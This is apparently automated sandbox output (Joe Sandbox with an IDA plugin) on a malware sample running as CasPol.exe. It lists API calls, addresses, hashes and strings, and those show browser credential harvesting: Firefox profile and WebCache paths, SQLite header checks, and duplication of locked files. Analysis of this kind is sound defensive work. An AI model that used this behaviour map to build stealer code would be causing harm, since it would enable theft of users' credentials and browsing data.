                                                                                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                          • String ID: advapi32.dll
                                                                                                                                                                          • API String ID: 2012295524-4050573280
                                                                                                                                                                          • Opcode ID: 4ec369c76c53d9d8d6299e0294e7621cc29ddf3fcf69dbd982a4794b684d00a1
                                                                                                                                                                          • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                          • Opcode Fuzzy Hash: 4ec369c76c53d9d8d6299e0294e7621cc29ddf3fcf69dbd982a4794b684d00a1
                                                                                                                                                                          • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 00403C09
                                                                                                                                                                          • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                          • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                          • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                          • API String ID: 1534475566-1174173950
                                                                                                                                                                          • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                          • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 669240632-0
                                                                                                                                                                          • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                          • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00414C40,?,00000000), ref: 00414BA4
                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                          • memset.MSVCRT ref: 00414C87
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                          • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                          Strings
                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                          • API String ID: 71295984-2036018995
                                                                                                                                                                          • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                          • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                          APIs
                                                                                                                                                                          • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                          • String ID: "%s"
                                                                                                                                                                          • API String ID: 1343145685-3297466227
                                                                                                                                                                          • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                          • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CCF
                                                                                                                                                                          • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                          • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                          • API String ID: 1714573020-3385500049
                                                                                                                                                                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 004087D6
                                                                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                          • memset.MSVCRT ref: 00408828
                                                                                                                                                                          • memset.MSVCRT ref: 00408840
                                                                                                                                                                          • memset.MSVCRT ref: 00408858
                                                                                                                                                                          • memset.MSVCRT ref: 00408870
                                                                                                                                                                          • memset.MSVCRT ref: 00408888
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2911713577-0
                                                                                                                                                                          • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                          • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcmp
                                                                                                                                                                          • String ID: @ $SQLite format 3
                                                                                                                                                                          • API String ID: 1475443563-3708268960
                                                                                                                                                                          • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                          • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcsicmpqsort
                                                                                                                                                                          • String ID: /nosort$/sort
                                                                                                                                                                          • API String ID: 1579243037-1578091866
                                                                                                                                                                          • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                          • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                          • memset.MSVCRT ref: 0040E629
                                                                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                          Strings
                                                                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                          • API String ID: 2887208581-2114579845
                                                                                                                                                                          • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                          • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset
                                                                                                                                                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                          • API String ID: 2221118986-1725073988
                                                                                                                                                                          • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                          • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00414C40,?,00000000), ref: 00414BA4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                          • API String ID: 2773794195-880857682
                                                                                                                                                                          • Opcode ID: 97e3436b7678629204c95b3b1f0e86467fe5b848d0a0c87f8b2ef990139e8914
                                                                                                                                                                          • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                          • Opcode Fuzzy Hash: 97e3436b7678629204c95b3b1f0e86467fe5b848d0a0c87f8b2ef990139e8914
                                                                                                                                                                          • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1033339047-0
                                                                                                                                                                          • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                          • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                          • memcmp.MSVCRT ref: 00444BA5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$memcmp
                                                                                                                                                                          • String ID: $$8
                                                                                                                                                                          • API String ID: 2808797137-435121686
                                                                                                                                                                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                          • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040525B
                                                                                                                                                                          • GetProcAddress.KERNEL32(0045DBE0,0045E298,00000060,00000000), ref: 00405266
                                                                                                                                                                            • Part of subcall function 00405211: GetProcAddress.KERNEL32(0045DBE0,?,00405282,00000000), ref: 00405217
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressLibraryLoadProc$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 966727022-0
                                                                                                                                                                          • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                          • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                                                                                                                          • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                          • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                            • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                            • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
                                                                                                                                                                            • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                          • CloseHandle.KERNELBASE(000000FF), ref: 0040E582
                                                                                                                                                                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                            • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                                                                                                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                            • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1979745280-0
                                                                                                                                                                          • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                          • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
